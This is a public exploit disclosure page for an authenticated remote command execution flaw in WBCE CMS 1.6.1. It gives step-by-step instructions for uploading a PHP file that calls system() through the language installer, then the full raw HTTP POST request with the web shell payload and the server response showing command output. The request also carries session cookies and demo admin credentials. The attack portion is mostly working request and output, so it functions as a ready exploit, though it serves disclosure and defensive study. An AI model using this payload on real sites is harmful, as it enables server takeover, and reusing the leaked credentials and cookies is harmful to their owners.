WBCE CMS Version 1.6.1 Remote Command Execution (Authenticated)

2024.04.21
Credit: tmrswrr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution # Date: 30/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip # Version: 1.6.1 # Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS ## POC: 1 ) Login with admin cred and click Add-ons 2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php 3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php 4 ) You will be see id command result Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) ### Post Request: POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1 Host: demos6.softaculous.com Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459 Content-Length: 522 Origin: https://demos6.softaculous.com Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="formtoken" 5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="userfile"; filename="upgrade.php" Content-Type: application/x-php <?php echo system('id'); ?> -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="submit" -----------------------------86020911415982314764024459-- ### Response : <!-- ################### Up from here: Original Code from original template ########### --> <!-- senseless positioning-table: needed for old modules which base on class td.content --> <div class="row" style="overflow:visible"> <div class="fg12"> <table id="former_positioning_table"> <tr> <td class="content"> uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) <div class="top alertbox_error fg12 error-box"> <i class=" fa fa-2x fa-warning signal"></i> <p>Invalid WBCE CMS language file. Please check the text file.</p> <p><a href="index.php" class="button">Back


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top